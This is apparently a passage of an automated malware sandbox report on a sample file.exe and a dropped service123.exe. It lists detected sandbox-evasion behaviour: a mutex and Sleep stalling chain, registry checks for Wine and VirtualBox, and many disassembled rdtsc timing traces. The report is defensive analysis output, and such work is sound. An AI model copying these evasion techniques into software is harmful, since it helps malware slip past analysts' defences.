Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161512F second address: 16149B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F8078BD3398h 0x0000000b pop ebx 0x0000000c popad 0x0000000d nop 0x0000000e jmp 00007F8078BD338Ah 0x00000013 push dword ptr [ebp+122D0711h] 0x00000019 pushad 0x0000001a push edi 0x0000001b sub edx, 48BBCC90h 0x00000021 pop eax 0x00000022 popad 0x00000023 call dword ptr [ebp+122D17ABh] 0x00000029 pushad 0x0000002a stc 0x0000002b xor eax, eax 0x0000002d stc 0x0000002e sub dword ptr [ebp+122D3322h], eax 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 pushad 0x00000039 and dx, 0C40h 0x0000003e mov edi, dword ptr [ebp+122D296Ch] 0x00000044 popad 0x00000045 mov dword ptr [ebp+122D2BE4h], eax 0x0000004b jng 00007F8078BD3393h 0x00000051 pushad 0x00000052 mov eax, dword ptr [ebp+122D2918h] 0x00000058 mov ecx, 5962A91Eh 0x0000005d popad 0x0000005e mov esi, 0000003Ch 0x00000063 mov dword ptr [ebp+122D36DDh], eax 0x00000069 jmp 00007F8078BD338Ah 0x0000006e add esi, dword ptr [esp+24h] 0x00000072 jmp 00007F8078BD338Eh 0x00000077 lodsw 0x00000079 or dword ptr [ebp+122D189Bh], edi 0x0000007f mov dword ptr [ebp+122D19C6h], edx 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 stc 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e jns 00007F8078BD3393h 0x00000094 nop 0x00000095 push eax 0x00000096 push edx 0x00000097 jmp 00007F8078BD3390h 0x0000009c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1796C38 second address: 1796C6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F80798BCE63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F80798BCE5Eh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F80798BCE5Ah 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1796C6C second address: 1796C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1796C73 second address: 1796C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F80798BCE5Fh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1796DE8 second address: 1796DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799917 second address: 1799931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799931 second address: 179994A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F8078BD3386h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F8078BD3386h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799B36 second address: 1799B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799B3A second address: 1799BAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 movsx ecx, si 0x0000000b sub dword ptr [ebp+122D3322h], edi 0x00000011 push 00000000h 0x00000013 jmp 00007F8078BD3395h 0x00000018 call 00007F8078BD3389h 0x0000001d jnc 00007F8078BD3394h 0x00000023 push eax 0x00000024 jc 00007F8078BD338Eh 0x0000002a push edx 0x0000002b jnc 00007F8078BD3386h 0x00000031 pop edx 0x00000032 mov eax, dword ptr [esp+04h] 0x00000036 jns 00007F8078BD3395h 0x0000003c mov eax, dword ptr [eax] 0x0000003e push eax 0x0000003f push edx 0x00000040 push edi 0x00000041 pushad 0x00000042 popad 0x00000043 pop edi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799BAF second address: 1799C68 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F80798BCE58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F80798BCE5Dh 0x00000013 pop eax 0x00000014 jno 00007F80798BCE58h 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F80798BCE58h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov esi, dword ptr [ebp+122D28B8h] 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F80798BCE58h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 0000001Ah 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a call 00007F80798BCE59h 0x0000005f jl 00007F80798BCE62h 0x00000065 push eax 0x00000066 jmp 00007F80798BCE5Ah 0x0000006b pop eax 0x0000006c push eax 0x0000006d je 00007F80798BCE6Bh 0x00000073 push edi 0x00000074 jmp 00007F80798BCE63h 0x00000079 pop edi 0x0000007a mov eax, dword ptr [esp+04h] 0x0000007e push eax 0x0000007f push edx 0x00000080 ja 00007F80798BCE58h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799C68 second address: 1799CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F8078BD3392h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8078BD3393h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799CAC second address: 1799CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799CB2 second address: 1799CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799CB8 second address: 1799CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799CBC second address: 1799CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799CC0 second address: 1799CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [ebp+124587A3h] 0x0000000f movzx edx, bx 0x00000012 mov dword ptr [ebp+122D38F0h], esi 0x00000018 xchg eax, ebx 0x00000019 jp 00007F80798BCE64h 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1799CF3 second address: 1799CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ABDC7 second address: 17ABDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ABDCC second address: 17ABDE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD3393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ABDE3 second address: 17ABDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BBE04 second address: 17BBE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BBE08 second address: 17BBE41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F80798BCE63h 0x00000010 jmp 00007F80798BCE69h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B9CCD second address: 17B9CDD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8078BD3386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B9CDD second address: 17B9CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BA273 second address: 17BA279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BA531 second address: 17BA542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F80798BCE56h 0x0000000a jg 00007F80798BCE56h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAC52 second address: 17BAC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAC56 second address: 17BAC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80798BCE65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F80798BCE62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAC87 second address: 17BAC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAC8B second address: 17BAC8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAC8F second address: 17BAC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAC97 second address: 17BACAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BACAE second address: 17BACB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BACB2 second address: 17BACEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80798BCE65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 ja 00007F80798BCE62h 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F80798BCE56h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BACEE second address: 17BACF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17AFF6C second address: 17AFF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F80798BCE62h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17AFF83 second address: 17AFF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8078BD3386h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17AFF90 second address: 17AFF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17AFF96 second address: 17AFFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8078BD3392h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAF41 second address: 17BAF5B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80798BCE5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F80798BCE56h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F80798BCE56h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAF5B second address: 17BAF73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8078BD338Ah 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAF73 second address: 17BAF77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAF77 second address: 17BAF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB7A8 second address: 17BB7AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB8F2 second address: 17BB8FF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8078BD3388h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD309 second address: 17BD313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD313 second address: 17BD31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD31A second address: 17BD326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F80798BCE56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD326 second address: 17BD32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD32A second address: 17BD353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F80798BCE5Bh 0x0000000c ja 00007F80798BCE56h 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jng 00007F80798BCE7Ch 0x0000001b je 00007F80798BCE5Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177ADC6 second address: 177ADD6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8078BD3386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C08A4 second address: 17C08A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C08A8 second address: 17C08DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 jnp 00007F8078BD3399h 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jl 00007F8078BD3386h 0x0000001e popad 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C08DD second address: 17C0906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F80798BCE69h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C0B1C second address: 17C0B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C0B22 second address: 17C0B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7AAC second address: 17C7AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3393h 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F8078BD3398h 0x00000011 jne 00007F8078BD3386h 0x00000017 jno 00007F8078BD3386h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7AEB second address: 17C7B1C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F80798BCE63h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F80798BCE5Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7B1C second address: 17C7B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7B22 second address: 17C7B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F80798BCE56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7B31 second address: 17C7B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7B35 second address: 17C7B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F80798BCE56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C6EF6 second address: 17C6F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F8078BD3386h 0x00000009 jmp 00007F8078BD3394h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7082 second address: 17C7086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C7086 second address: 17C709F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jp 00007F8078BD3386h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C82D5 second address: 17C834F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007F80798BCE60h 0x0000000f jns 00007F80798BCE67h 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F80798BCE61h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jmp 00007F80798BCE69h 0x00000026 pop eax 0x00000027 add esi, 1A001A5Ah 0x0000002d push D6BE00CCh 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F80798BCE5Ah 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C84A0 second address: 17C84A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C875E second address: 17C8762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CAAE6 second address: 17CAB01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F8078BD3386h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8078BD338Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CDDEF second address: 17CDDF9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F80798BCE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
